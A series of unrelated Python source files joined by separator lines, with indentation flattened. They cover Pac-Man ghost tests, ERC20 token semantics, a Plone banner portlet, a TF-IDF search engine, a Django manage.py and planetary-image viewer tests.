cv2.destroyAllWindows()
|
import inspect
import sys
from .cloud_fraction import cloud_fraction # noqa
from .fractal_dimension import fractal_dimension # noqa
from .objects import * # noqa
from .open_sky import open_sky # noqa
from .orientation import orientation # noqa
def _find_mask_functions():
"""
Look through the functions available in this module and return all the ones
that look like they operate on object masks
"""
def _takes_object_mask_kwarg(fn):
fn_sig = inspect.signature(fn)
return "mask" in fn_sig.parameters
fns = [
(fn_name, fn)
for (fn_name, fn) in inspect.getmembers(
sys.modules[__name__], inspect.isfunction
)
if not fn_name.startswith("_") and _takes_object_mask_kwarg(fn)
]
return dict(fns)
ALL_METRIC_FUNCTIONS = _find_mask_functions()
|
import unittest
from katas.kyu_6.alternating_loops import combine
class CombineTestCase(unittest.TestCase):
def test_equals(self):
self.assertEqual(combine(['a', 'b', 'c'], [1, 2, 3]),
['a', 1, 'b', 2, 'c', 3])
def test_equals_2(self):
self.assertEqual(combine(['a', 'b', 'c'], [1, 2, 3, 4, 5]),
['a', 1, 'b', 2, 'c', 3, 4, 5])
def test_equals_3(self):
self.assertEqual(combine(
['a', 'b', 'c'], [1, 2, 3, 4, 5], [6, 7], [8]),
['a', 1, 6, 8, 'b', 2, 7, 'c', 3, 4, 5])
|
from backpack.extensions.module_extension import ModuleExtension
class FirstOrderModuleExtension(ModuleExtension):
def backpropagate(self, ext, module, g_inp, g_out, bpQuantities):
return None
|
try:
from tkinter import *
except:
from Tkinter import *
import sys
sys.path.append('../src/org')
from gameplay import Ghost as gh
from gameplay import Pacman as pm
from gameplay import Wall as w
from maps import Map1
from display import DrawingGenerics
import math
import unittest
class test_Ghost(unittest.TestCase):
def setUp(self):
root = Tk()
gameCanvas = Canvas(root, width = 200, height = 200)
gameCanvas.grid(row = 0, column = 0)
self.ghostSpecs = Map1.getGhostSpecifications()
self.pacmanSpecs = Map1.getPacmanSpecifications()
self.pacman = pm.Pacman(self, gameCanvas, self.pacmanSpecs)
self.wallSpecs = Map1.getWallSpecifications()
self.ghost1 = gh.Ghost(self, gameCanvas, 1, self.ghostSpecs[0])
self.ghost2 = gh.Ghost(self, gameCanvas, 2, self.ghostSpecs[1])
self.ghost3 = gh.Ghost(self, gameCanvas, 3, self.ghostSpecs[2])
self.ghost4 = gh.Ghost(self, gameCanvas, 4, self.ghostSpecs[3])
self.dots = [0,0,0,0,0,0,0,0,0,0]
self.dotsEaten=100
self.walls = []
for i in self.wallSpecs:
self.walls.append(w.Wall(gameCanvas,i))
def getGhosts(self):
_ghostSpecs = {0 : self.ghost1, 1 : self.ghost2, 2 : self.ghost3, 3 : self.ghost4}
return _ghostSpecs
def getPacman(self):
return self.pacman
def getDots(self):
return self.dots
def getDotsEaten(self):
return self.dotsEaten
def getWalls(self):
return self.walls
def test_initGame(self):
self.ghost1.initGame()
self.assertFalse(self.ghost1.started)
self.assertFalse(self.ghost1.left)
self.assertFalse(self.ghost1.right)
self.assertFalse(self.ghost1.up)
self.assertFalse(self.ghost1.down)
def test_start(self):
#Move ghost to arbitrary location
self.ghost1.xCenter=0
self.ghost1.yCenter=10
#Ghost should be moved back to start
self.ghost1.start()
self.assertEqual(self.ghost1.xCenter,14*DrawingGenerics.TILE_SIZE)
self.assertEqual(self.ghost1.xCenter,14*DrawingGenerics.TILE_SIZE)
def test_restart(self):
self.ghost1.restart()
self.assertEqual(self.ghost1.dotLimit,230)
self.assertFalse(self.ghost1.started)
#Current coordinates check
self.assertEqual(self.ghost1.toggleChaseScatter,6 * DrawingGenerics.CYCLES_PER_SECOND)
def test_started_(self):
self.ghost1.left=False
self.ghost1.right=False
self.ghost1.color = 'red'
self.ghost1.started_()
self.assertTrue(self.ghost1.left)
self.assertFalse(self.ghost1.right)
self.ghost1.left=False
self.ghost1.right=False
self.ghost1.color = 'cyan'
self.ghost1.started_()
self.assertFalse(self.ghost1.left)
self.assertTrue(self.ghost1.right)
self.ghost1.left=False
self.ghost1.right=False
self.ghost1.color = 'pink'
self.ghost1.started_()
self.assertFalse(self.ghost1.left)
self.assertTrue(self.ghost1.right)
self.ghost1.left=False
self.ghost1.right=False
self.ghost1.color = 'orange'
self.ghost1.started_()
self.assertTrue(self.ghost1.left)
self.assertFalse(self.ghost1.right)
self.assertTrue(self.ghost1.started)
def test_eat(self):
self.assertEqual(self.ghost1.eat(),200)
def test_chase(self):
self.ghost1.chase()
self.assertEqual(self.ghost1.color,DrawingGenerics.GHOST_COLOR[1])
self.assertEqual(self.ghost1.state,DrawingGenerics.GHOST_STATE['Chase'])
self.assertEqual(self.ghost1.speed,1.0 * DrawingGenerics.PIXEL)
self.assertEqual(self.ghost1.stateFlag,DrawingGenerics.GHOST_STATE['Chase'])
def test_scatter(self):
self.ghost1.scatter()
self.assertEqual(self.ghost1.color,DrawingGenerics.GHOST_COLOR[1])
self.assertEqual(self.ghost1.state,DrawingGenerics.GHOST_STATE['Scatter'])
self.assertEqual(self.ghost1.speed,1.0 * DrawingGenerics.PIXEL)
self.assertEqual(self.ghost1.stateFlag,DrawingGenerics.GHOST_STATE['Scatter'])
def test_returnToPen(self):
self.ghost1.returnToPen()
self.assertEqual(self.ghost1.color,"grey")
self.assertEqual(self.ghost1.state,DrawingGenerics.GHOST_STATE['Eaten'])
self.assertEqual(self.ghost1.speed,2 * DrawingGenerics.PIXEL)
self.assertEqual(self.ghost1.destX,14)
self.assertEqual(self.ghost1.destY,14.5)
def test_fright(self):
self.ghost1.fright(10)
self.assertEqual(self.ghost1.color,DrawingGenerics.GHOST_FRIGHT_COLOR[1])
self.assertEqual(self.ghost1.state,DrawingGenerics.GHOST_STATE['Fright'])
self.assertEqual(self.ghost1.speed,0.62 * DrawingGenerics.PIXEL)
self.assertEqual(self.ghost1.frightCycles,10)
def test_isInTunnel(self):
#Should return True
self.ghost1.xCenter = 0*DrawingGenerics.TILE_SIZE - DrawingGenerics.TILE_CENTERING
self.ghost1.yCenter = 18*DrawingGenerics.TILE_SIZE - DrawingGenerics.TILE_CENTERING
self.assertTrue(self.ghost1.isInTunnel())
self.ghost1.xCenter = 24*DrawingGenerics.TILE_SIZE - DrawingGenerics.TILE_CENTERING
self.ghost1.yCenter = 18*DrawingGenerics.TILE_SIZE - DrawingGenerics.TILE_CENTERING
self.assertTrue(self.ghost1.isInTunnel())
#Should return False
self.ghost1.xCenter = 0*DrawingGenerics.TILE_SIZE - DrawingGenerics.TILE_CENTERING
self.ghost1.yCenter = 17.9*DrawingGenerics.TILE_SIZE - DrawingGenerics.TILE_CENTERING
self.assertFalse(self.ghost1.isInTunnel())
self.ghost1.xCenter = 22*DrawingGenerics.TILE_SIZE - DrawingGenerics.TILE_CENTERING
self.ghost1.yCenter = 18*DrawingGenerics.TILE_SIZE - DrawingGenerics.TILE_CENTERING
self.assertFalse(self.ghost1.isInTunnel())
self.ghost1.xCenter = 6*DrawingGenerics.TILE_SIZE - DrawingGenerics.TILE_CENTERING
self.ghost1.yCenter = 18*DrawingGenerics.TILE_SIZE - DrawingGenerics.TILE_CENTERING
self.assertFalse(self.ghost1.isInTunnel())
self.ghost1.xCenter = 12*DrawingGenerics.TILE_SIZE - DrawingGenerics.TILE_CENTERING
self.ghost1.yCenter = 18*DrawingGenerics.TILE_SIZE - DrawingGenerics.TILE_CENTERING
self.assertFalse(self.ghost1.isInTunnel())
def test_reverseDirection(self):
self.ghost1.left=True
self.ghost1.right=False
self.ghost1.up=False
self.ghost1.down=False
self.ghost1.reverseDirection()
self.assertTrue(self.ghost1.right)
self.assertFalse(self.ghost1.left)
self.ghost1.reverseDirection()
self.assertTrue(self.ghost1.left)
self.assertFalse(self.ghost1.right)
self.ghost1.left=False
self.ghost1.right=False
self.ghost1.up=True
self.ghost1.down=False
self.ghost1.reverseDirection()
self.assertTrue(self.ghost1.down)
self.assertFalse(self.ghost1.up)
self.ghost1.reverseDirection()
self.assertTrue(self.ghost1.up)
self.assertFalse(self.ghost1.down)
def test_toggleColor(self):
self.ghost1.color = DrawingGenerics.GHOST_FRIGHT_COLOR[1]
self.ghost1.toggleColor()
self.assertEqual(self.ghost1.color,DrawingGenerics.GHOST_FRIGHT_COLOR[2])
self.ghost1.toggleColor()
self.assertEqual(self.ghost1.color,DrawingGenerics.GHOST_FRIGHT_COLOR[1])
def test_toggleState(self):
#We will check these values to make sure parts of toggleState have worked
self.ghost1.left=True
self.ghost1.right=False
self.ghost1.up=False
self.ghost1.down=False
self.ghost1.stateFlag = DrawingGenerics.GHOST_STATE['Chase']
self.ghost1.state = DrawingGenerics.GHOST_STATE['Scatter']
self.ghost1.toggleState()
#Expected that ghost1.stateFlag is now Scatter
self.assertEqual(self.ghost1.state,DrawingGenerics.GHOST_STATE['Scatter'])
self.assertEqual(self.ghost1.stateFlag,DrawingGenerics.GHOST_STATE['Scatter'])
self.assertTrue(self.ghost1.left)
self.assertFalse(self.ghost1.right)
self.ghost1.toggleState()
#Expected change in direction
self.assertEqual(self.ghost1.state,DrawingGenerics.GHOST_STATE['Chase'])
self.assertEqual(self.ghost1.stateFlag,DrawingGenerics.GHOST_STATE['Chase'])
self.assertTrue(self.ghost1.right)
self.assertFalse(self.ghost1.left)
self.ghost1.left=True
self.ghost1.right=False
self.ghost1.up=False
self.ghost1.down=False
self.ghost1.stateFlag = DrawingGenerics.GHOST_STATE['Scatter']
self.ghost1.state = DrawingGenerics.GHOST_STATE['Chase']
self.ghost1.toggleState()
#Expected that ghost1.stateFlag is now Scatter
self.assertEqual(self.ghost1.state,DrawingGenerics.GHOST_STATE['Chase'])
self.assertEqual(self.ghost1.stateFlag,DrawingGenerics.GHOST_STATE['Chase'])
self.assertTrue(self.ghost1.left)
self.assertFalse(self.ghost1.right)
self.ghost1.toggleState()
#Expected change in direction
self.assertEqual(self.ghost1.state,DrawingGenerics.GHOST_STATE['Scatter'])
self.assertEqual(self.ghost1.stateFlag,DrawingGenerics.GHOST_STATE['Scatter'])
self.assertTrue(self.ghost1.right)
self.assertFalse(self.ghost1.left)
def test_process(self):
#Check for scatter mode
self.ghost1.toggleChaseScatterCycle = 5
self.ghost1.toggleChaseScatter = 5
self.ghost1.frightCycles = 100
self.ghost1.state = DrawingGenerics.GHOST_STATE['Scatter']
self.ghost1.process()
self.assertEqual(self.ghost1.toggleChaseScatter,4)
self.assertEqual(self.ghost1.stateFlag,DrawingGenerics.GHOST_STATE['Scatter'])
#Check for chase mode
self.ghost1.toggleChaseScatterCycle = 5
self.ghost1.toggleChaseScatter = 5
self.ghost1.frightCycles = 100
self.ghost1.state = DrawingGenerics.GHOST_STATE['Chase']
self.ghost1.process()
self.assertEqual(self.ghost1.toggleChaseScatter,4)
self.assertEqual(self.ghost1.stateFlag,DrawingGenerics.GHOST_STATE['Chase'])
#Check for toggle, both ways
self.ghost1.toggleScatterCycle = 7
self.ghost1.toggleChaseScatter = 0
self.ghost1.frightCycles = 100
self.ghost1.state = DrawingGenerics.GHOST_STATE['Chase']
self.ghost1.process()
self.assertEqual(self.ghost1.toggleChaseScatter,7)
self.assertEqual(self.ghost1.stateFlag,DrawingGenerics.GHOST_STATE['Scatter'])
self.ghost1.toggleChaseCycle = 20
self.ghost1.toggleChaseScatter = 0
self.ghost1.frightCycles = 100
self.ghost1.state = DrawingGenerics.GHOST_STATE['Scatter']
self.ghost1.process()
self.assertEqual(self.ghost1.toggleChaseScatter,20)
self.assertEqual(self.ghost1.stateFlag,DrawingGenerics.GHOST_STATE['Chase'])
#Check for frightened mode, before flashing
self.ghost1.toggleChaseScatterCycle = 5
self.ghost1.toggleChaseScatter = 5
self.ghost1.frightCycles = 100
self.ghost1.state = DrawingGenerics.GHOST_STATE['Fright']
self.ghost1.process()
self.assertEqual(self.ghost1.toggleChaseScatter,4)
self.assertEqual(self.ghost1.frightCycles,99)
#Check for frightened mode, flashing
self.ghost1.toggleChaseScatterCycle = 5
self.ghost1.toggleChaseScatter = 5
self.ghost1.frightCycles = 40
self.ghost1.state = DrawingGenerics.GHOST_STATE['Fright']
self.ghost1.process()
self.assertEqual(self.ghost1.toggleChaseScatter,4)
#In tunnel
self.ghost1.xCenter = 0
self.ghost1.yCenter = 280
self.ghost1.process()
self.assertTrue(self.ghost1.isInTunnel())
self.assertEqual(self.ghost1.speed,0.5 * DrawingGenerics.PIXEL)
def test_setNextDirection(self):
self.ghost1.destX=14*DrawingGenerics.TILE_SIZE
self.ghost1.destY=14*DrawingGenerics.TILE_SIZE
self.ghost4.destX=14*DrawingGenerics.TILE_SIZE
self.ghost4.destY=14*DrawingGenerics.TILE_SIZE
#Ghost 1 should only be able to move right
self.ghost1.setNextDirection()
self.assertTrue(self.ghost1.right)
#Ghost 4 should only be able to move left or right at the beginning
self.ghost4.setNextDirection()
self.assertTrue(self.ghost4.left or self.ghost4.right)
def test_shortestDistance(self):
dirDict = { 'left': 1, 'right': 2, 'up': 3, 'down': 4 }
#nextDir should be left
self.assertEqual(self.ghost1.shortestDistance(dirDict,10,16),"left")
#nextDir should be right
self.assertEqual(self.ghost2.shortestDistance(dirDict,16,18),"right")
#nextDir should be up
self.assertEqual(self.ghost3.shortestDistance(dirDict,17,15),"up")
#nextDir should be down
self.assertEqual(self.ghost4.shortestDistance(dirDict,13,16),"down")
def test_distance(self):
#Check that a distances are calculated correctly
self.assertEqual(self.ghost1.distance(0,0,3,4),5)
self.assertEqual(self.ghost1.distance(0,0,1,1),math.sqrt(2))
def test_destinationTile(self):
#Ghost 1, in chase mode, follows inky's logic
self.ghost1.state=DrawingGenerics.GHOST_STATE['Chase']
self.pacman.currDir='left'
rX,rY = self.ghost4.inTile()
dX,dY = self.ghost1.destinationTile()
pX,pY = self.getPacman().inTile()
pX = pX-2
g1X,g1Y = (rX+2*(pX-rX),rY+2*(pY-rY))
self.assertEqual((dX,dY),(g1X,g1Y))
self.ghost1.state=DrawingGenerics.GHOST_STATE['Chase']
self.pacman.currDir='up'
rX,rY = self.ghost4.inTile()
dX,dY = self.ghost1.destinationTile()
pX,pY = self.getPacman().inTile()
pX,pY = (pX-2,pY-2)
g1X,g1Y = (rX+2*(pX-rX),rY+2*(pY-rY))
self.assertEqual((dX,dY),(g1X,g1Y))
#Ghost 2, in chase mode, follows clyde's logic
self.ghost2.state=DrawingGenerics.GHOST_STATE['Chase']
self.pacman.currDir='right'
dX,dY = self.ghost2.destinationTile()
pX,pY = self.getPacman().inTile()
pX = pX+4
self.assertEqual((dX,dY),(pX,pY))
self.ghost2.state=DrawingGenerics.GHOST_STATE['Chase']
self.pacman.currDir='up'
dX,dY = self.ghost2.destinationTile()
pX,pY = self.getPacman().inTile()
pX,pY = (pX-4,pY-4)
self.assertEqual((dX,dY),(pX,pY))
#Ghost 3, in chase mode, follows pinky's logic
self.ghost3.state=DrawingGenerics.GHOST_STATE['Chase']
#Ghost 3 is far from pacman (arbitrary coordinates for ghost and pacman, and are sufficiently far from one another)
self.ghost3.xCenter = 0
self.ghost3.yCenter = 0
self.pacman.xCenter = 200
self.pacman.yCenter = 200
dX,dY = self.ghost3.destinationTile()
pX,pY = self.getPacman().inTile()
self.assertEqual((dX,dY),(pX,pY))
#(Ghost 3 targets pacman)
#Ghost 3 is close to pacman
self.ghost3.xCenter = 50
self.ghost3.yCenter = 50
self.pacman.xCenter = 55
self.pacman.yCenter = 55
dX,dY = self.ghost3.destinationTile()
self.assertEqual((dX,dY),(0.5,34.5))
#(Ghost 3 returns to his corner)
#Ghost 4, in chase mode, follows blinky's logic
self.ghost4.state=DrawingGenerics.GHOST_STATE['Chase']
dX,dY = self.ghost4.destinationTile()
pX,pY = self.getPacman().inTile()
self.assertEqual((dX,dY),(pX,pY))
#Ghost 1, in scatter mode, targets bottom right corner
self.ghost1.state=DrawingGenerics.GHOST_STATE['Scatter']
dX,dY = self.ghost1.destinationTile()
self.assertEqual((dX,dY),(27.5,34.5))
#Ghost 2, in scatter mode, targets bottom left corner
self.ghost2.state=DrawingGenerics.GHOST_STATE['Scatter']
dX,dY = self.ghost2.destinationTile()
self.assertEqual((dX,dY),(2.5,0.5))
#Ghost 3, in scatter mode, targets top left corner
self.ghost3.state=DrawingGenerics.GHOST_STATE['Scatter']
dX,dY = self.ghost3.destinationTile()
self.assertEqual((dX,dY),(0.5,34.5))
#Ghost 4, in scatter mode, targets top right corner
self.ghost4.state=DrawingGenerics.GHOST_STATE['Scatter']
dX,dY = self.ghost4.destinationTile()
self.assertEqual((dX,dY),(25.5,0.5))
#Ghost(any) is eaten
self.ghost1.state=DrawingGenerics.GHOST_STATE['Eaten']
dX,dY = self.ghost1.destinationTile()
self.assertEqual((dX,dY),(14,14.5)) |
# Copyright 2021 DAI Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at: http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from ethtx.models.semantics_model import (
EventSemantics,
ParameterSemantics,
TransformationSemantics,
FunctionSemantics,
)
erc20_transfer_event = EventSemantics(
signature="0xddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef",
anonymous=False,
name="Transfer",
parameters=[
ParameterSemantics(
parameter_name="src", parameter_type="address", indexed=True
),
ParameterSemantics(
parameter_name="dst", parameter_type="address", indexed=True
),
ParameterSemantics(
parameter_name="value", parameter_type="uint256", indexed=False
),
],
)
erc20_transfer_event_transformation = {
"__input2__": TransformationSemantics(
transformation="__input2__ / 10**token_decimals(__contract__)"
)
}
erc20_approval_event = EventSemantics(
signature="0x8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925",
anonymous=False,
name="Approval",
parameters=[
ParameterSemantics(
parameter_name="src", parameter_type="address", indexed=True
),
ParameterSemantics(
parameter_name="dst", parameter_type="address", indexed=True
),
ParameterSemantics(
parameter_name="value", parameter_type="uint256", indexed=False
),
],
)
erc20_approval_event_transformation = {
"__input2__": TransformationSemantics(
transformation="__input2__ / 10**token_decimals(__contract__)"
)
}
erc20_transfer_function = FunctionSemantics(
signature="0xa9059cbb",
name="transfer",
inputs=[
ParameterSemantics(parameter_name="recipient", parameter_type="address"),
ParameterSemantics(parameter_name="amount", parameter_type="uint256"),
],
outputs=[ParameterSemantics(parameter_name="", parameter_type="bool")],
)
erc20_transfer_function_transformation = {
"__input1__": TransformationSemantics(
transformation="__input1__ / 10**token_decimals(__contract__)"
)
}
erc20_transferFrom_function = FunctionSemantics(
signature="0x23b872dd",
name="transferFrom",
inputs=[
ParameterSemantics(parameter_name="sender", parameter_type="address"),
ParameterSemantics(parameter_name="recipient", parameter_type="address"),
ParameterSemantics(parameter_name="amount", parameter_type="uint256"),
],
outputs=[ParameterSemantics(parameter_name="", parameter_type="bool")],
)
erc20_transferFrom_function_transformation = {
"__input2__": TransformationSemantics(
transformation="__input2__ / 10**token_decimals(__contract__)"
)
}
erc20_approve_function = FunctionSemantics(
signature="0x095ea7b3",
name="approve",
inputs=[
ParameterSemantics(parameter_name="spender", parameter_type="address"),
ParameterSemantics(parameter_name="amount", parameter_type="uint256"),
],
outputs=[ParameterSemantics(parameter_name="", parameter_type="bool")],
)
erc20_approve_function_transformation = {
"__input1__": TransformationSemantics(
transformation="__input1__ / 10**token_decimals(__contract__)"
)
}
erc20_balanceOf_function = FunctionSemantics(
signature="0x70a08231",
name="balanceOf",
inputs=[ParameterSemantics(parameter_name="holder", parameter_type="address")],
outputs=[ParameterSemantics(parameter_name="", parameter_type="uint256")],
)
erc20_balanceOf_function_transformation = {
"__output0__": TransformationSemantics(
transformation="__output0__ / 10**token_decimals(__contract__)"
)
}
erc20_totalSupply_function = FunctionSemantics(
signature="0x18160ddd",
name="totalSupply",
inputs=[],
outputs=[ParameterSemantics(parameter_name="", parameter_type="uint256")],
)
erc20_totalSupply_function_transformation = {
"__output0__": TransformationSemantics(
transformation="__output0__ / 10**token_decimals(__contract__)"
)
}
ERC20_EVENTS = {
erc20_transfer_event.signature: erc20_transfer_event,
erc20_approval_event.signature: erc20_approval_event,
}
ERC20_FUNCTIONS = {
erc20_transfer_function.signature: erc20_transfer_function,
erc20_transferFrom_function.signature: erc20_transferFrom_function,
erc20_approve_function.signature: erc20_approve_function,
erc20_balanceOf_function.signature: erc20_balanceOf_function,
erc20_totalSupply_function.signature: erc20_totalSupply_function,
}
ERC20_TRANSFORMATIONS = {
erc20_transfer_event.signature: erc20_transfer_event_transformation,
erc20_approval_event.signature: erc20_approval_event_transformation,
erc20_transfer_function.signature: erc20_transfer_function_transformation,
erc20_transferFrom_function.signature: erc20_transferFrom_function_transformation,
erc20_approve_function.signature: erc20_approve_function_transformation,
erc20_balanceOf_function.signature: erc20_balanceOf_function_transformation,
erc20_totalSupply_function.signature: erc20_totalSupply_function_transformation,
}
|
# -*- coding:utf-8 -*-
from model import db
class ApnsUser(db.Model):
id = db.Column(db.Integer, primary_key=True)
user_id = db.Column(db.Integer, db.ForeignKey('user.id'))
user = db.relationship('User', backref=db.backref('apns_users', lazy='dynamic'))
apns_token = db.Column(db.VARCHAR(255))
created_at = db.Column(db.DateTime, server_default=db.func.now())
updated_at = db.Column(db.DateTime, server_default=db.func.now(), onupdate=db.func.now())
def __init__(self, user, apns_token):
self.user = user
self.apns_token = apns_token
|
#!/usr/bin/env python
import os
import sys
# This bootstraps the virtualenv so that the system Python can use it
app_root = os.path.dirname(os.path.realpath(__file__))
activate_this = os.path.join(app_root, 'bin', 'activate_this.py')
execfile(activate_this, dict(__file__=activate_this))
if __name__ == "__main__":
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "capomastro.settings")
from django.core.management import execute_from_command_line
execute_from_command_line(sys.argv)
|
import pandas as pd
import numpy as np
import numpy.linalg as LA # operasi baris elementer
from sklearn.feature_extraction.text import CountVectorizer # tf-idf
from sklearn.feature_extraction.text import TfidfTransformer, TfidfVectorizer # tf-idf
from sklearn.metrics.pairwise import cosine_similarity # cosine similarity
from nltk.corpus import stopwords # preprocessing
from nltk.stem import PorterStemmer # preprocessing bahasa inggris
from Sastrawi.StopWordRemover.StopWordRemoverFactory import StopWordRemoverFactory # preprocessing
from Sastrawi.Stemmer.StemmerFactory import StemmerFactory #preprocessing
import string # ya buat string
stemmer = StemmerFactory().create_stemmer() # Object stemmer
remover = StopWordRemoverFactory().create_stop_word_remover() # objek stopword
translator = str.maketrans('', '', string.punctuation)
def stemmerEN(text):
porter = PorterStemmer()
stop = set(stopwords.words('english'))
text = text.lower()
text = [i for i in text.lower().split() if i not in stop]
text = ' '.join(text)
preprocessed_text = text.translate(translator)
text_stem = porter.stem(preprocessed_text)
return text_stem
def preprocess(text):
text = text.lower()
text_clean = remover.remove(text) #fungsi hapus stopword
text_stem = stemmer.stem(text_clean)
text_stem = stemmerEN(text_stem)
return text_stem
class Engine:
def __init__(self):
self.cosine_score = []
self.train_set = [] # Documents
self.test_set = [] # Query
def addDocument(self, word): # fungsi untuk menambahkan dokumen dataset ke dalam list train_set
self.train_set.append(word)
def setQuery(self, word): # fungsi untuk menambahkan data query ke dalam list test_Set
self.test_set.append(word)
def process_score(self):
stopWords = stopwords.words('english')
vectorizer = CountVectorizer()
transformer = TfidfTransformer()
trainVectorizerArray = vectorizer.fit_transform(self.train_set).toarray()
# menghitung Bobot dokumen dataset dan uji dan kemudian disimpan dalam bentuk array
testVectorizerArray = vectorizer.transform(self.test_set).toarray()
cx = lambda a, b: round(np.inner(a, b) / (LA.norm(a) * LA.norm(b)), 3)
#fungsi tanpa nama untuk normalisasi data dan definisi rumus Cosine Similarity
# print testVectorizerArray
output = []
for i in range(0, len(testVectorizerArray)):
output.append([])
for vector in trainVectorizerArray:
# print vector
u = 0
for testV in testVectorizerArray:
#perhitungan Cosine Similarity dalam bentuk vector dari dataset dengan query
#yang di masukan yang kemudian mengembalikan nilai cosine ke dalam variable
#cosine_score dalam bentuk list.
# print testV
cosine = cx(vector, testV)
# self.cosine_score.append(cosine)
# bulatin = (round(cosine),2)
output[u].append((cosine))
u = u + 1
return output |
from AccessControl import SecurityManagement
from Products.ATContentTypes.permission import ChangeTopics
from Products.Five.browser.pagetemplatefile import ViewPageTemplateFile
from plone.app.form.widgets.uberselectionwidget import UberSelectionWidget
from plone.app.portlets.portlets import base
from plone.app.vocabularies.catalog import SearchableTextSourceBinder
from plone.memoize.instance import memoize
from plone.portlets.interfaces import IPortletDataProvider
from zope import schema
from zope.component import getMultiAdapter
from zope.formlib import form
from zope.i18nmessageid import MessageFactory
from zope.interface import implements
try:
from plone.app.collection.interfaces import ICollection
except ImportError:
from zope.interface import Interface
class ICollection(Interface):
pass
_ = MessageFactory('collective.banner')
class IBannerPortlet(IPortletDataProvider):
"""A portlet displaying a banners from a Collection's results
"""
target_collection = schema.Choice(
title=_(u"Target collection"),
description=_(u"Find the collection which provides the items to list"),
required=True,
source=SearchableTextSourceBinder(
{'portal_type': ('Topic', 'Collection')},
default_query='path:'))
timer = schema.Int(
title=_(u"Timer"),
description=_(u"Carousel rotated time (milliseconds)"),
required=False,
default=10000)
image_scale = schema.Choice(
title=_(u'portlet_image_scale', default=u'Image Scale'),
description=_(u'portlet_help_image_scale',
default=u'Select, which image scale should be used '
u'for the portlet, if there is any image.'),
required=True,
default=None,
vocabulary="collective.banner.ImageScaleVocabulary",
)
class Assignment(base.Assignment):
implements(IBannerPortlet)
target_collection = None
timer = 10000
image_scale = None
def __init__(self, target_collection=None, timer=10000, image_scale=None):
self.target_collection = target_collection
self.timer = timer
self.image_scale = image_scale
@property
def title(self):
return u"Banner portlet"
class Renderer(base.Renderer):
render = ViewPageTemplateFile('portlet.pt')
def __init__(self, *args, **kwargs):
super(Renderer, self).__init__(*args, **kwargs)
self.request.set('banner_image_scale', self.data.image_scale)
@property
def available(self):
return len(self.results())
@memoize
def collection(self):
cpath = self.data.target_collection
if isinstance(cpath, basestring) and cpath.startswith('/'):
cpath = cpath[1:]
if not cpath:
return None
portal_state = getMultiAdapter((self.context, self.request),
name=u'plone_portal_state')
portal = portal_state.portal()
if isinstance(cpath, unicode):
# restrictedTraverse accepts only strings
cpath = str(cpath)
return portal.restrictedTraverse(cpath, default=None)
def collection_url(self):
collection = self.collection()
if collection is None:
return None
else:
return collection.absolute_url()
@memoize
def results(self):
results = []
collection = self.collection()
if collection is not None:
results = collection.queryCatalog()
return results
def get_tile(self, obj):
# When adapter is uesd this means we check whether obj has any special
# instructions about how to be handled in defined view or interface
# for multi adapter the same is true except more object than just the
# obj are check for instructions
#have to use traverse to make zpt security work
tile = obj.unrestrictedTraverse("banner-tile")
if tile is None:
return None
return tile()
def edit_collection(self):
provider = self.collection()
smanager = SecurityManagement.getSecurityManager()
allowed = smanager.checkPermission(ChangeTopics, provider)
if allowed:
provider = self.collection()
if provider is not None:
if ICollection.providedBy(provider):
return provider.absolute_url() + '/edit'
return provider.absolute_url() + '/criterion_edit_form'
return None
class AddForm(base.AddForm):
form_fields = form.Fields(IBannerPortlet)
form_fields['target_collection'].custom_widget = UberSelectionWidget
label = _(u"Add Banner Portlet")
description = _(u"This portlet display a listing of items from a \
Collection as a banner carousel.")
def create(self, data):
return Assignment(**data)
class EditForm(base.EditForm):
form_fields = form.Fields(IBannerPortlet)
form_fields['target_collection'].custom_widget = UberSelectionWidget
label = _(u"Edit Banner Portlet")
description = _(u"This portlet display a listing of items from a \
Collection as a banner carousel.")
|
import os
from functools import wraps
from qtpy import QtWidgets, QtCore
from pdsview import pdsview, channels_dialog, band_widget
FILE_1 = os.path.join(
'tests', 'mission_data', '2m132591087cfd1800p2977m2f1.img')
FILE_2 = os.path.join(
'tests', 'mission_data', '2p129641989eth0361p2600r8m1.img')
FILE_3 = os.path.join(
'tests', 'mission_data', '1p190678905erp64kcp2600l8c1.img')
FILE_4 = os.path.join(
'tests', 'mission_data', 'h58n3118.img')
FILE_5 = os.path.join(
'tests', 'mission_data', '1p134482118erp0902p2600r8m1.img')
FILE_6 = os.path.join(
'tests', 'mission_data', '0047MH0000110010100214C00_DRCL.IMG')
test_files = [FILE_1, FILE_2, FILE_3, FILE_4, FILE_5, FILE_6]
FILE_1_NAME = '2m132591087cfd1800p2977m2f1.img'
FILE_2_NAME = '2p129641989eth0361p2600r8m1.img'
FILE_3_NAME = '1p190678905erp64kcp2600l8c1.img'
FILE_4_NAME = 'h58n3118.img'
FILE_5_NAME = '1p134482118erp0902p2600r8m1.img'
FILE_6_NAME = '0047MH0000110010100214C00_DRCL.IMG'
class TestChannelsDialogModel(object):
test_images = pdsview.ImageSet(test_files)
window = pdsview.PDSViewer(test_images)
model = channels_dialog.ChannelsDialogModel(window)
def test_init(self):
assert self.model._views == set()
assert self.model.current_index == 0
assert isinstance(self.model.rgb_models, tuple)
assert len(self.model.rgb_models) == 3
for model in self.model.rgb_models:
assert isinstance(model, band_widget.BandWidgetModel)
assert self.model.red_model.name == 'Red'
assert self.model.red_model.rgb_index == 0
assert self.model.green_model.name == 'Green'
assert self.model.green_model.rgb_index == 1
assert self.model.blue_model.name == 'Blue'
assert self.model.blue_model.rgb_index == 2
assert isinstance(self.model.menu_indices, list)
assert self.model.menu_indices == [0, 1, 2]
def test_images(self):
images = self.window.image_set.images
expected_images = [image[0] for image in images]
assert self.model.images == expected_images
def test_rgb(self):
assert self.model.rgb == self.window.image_set.rgb
def test_image_names(self):
names = [
FILE_5_NAME, FILE_3_NAME, FILE_1_NAME, FILE_2_NAME, FILE_4_NAME
]
assert self.model.image_names == names
def test_rgb_names(self):
rgb_names = [FILE_5_NAME, FILE_3_NAME, FILE_1_NAME]
assert self.model.rgb_names == rgb_names
def test_alphas(self):
assert self.model.alphas == [1., 1., 1.]
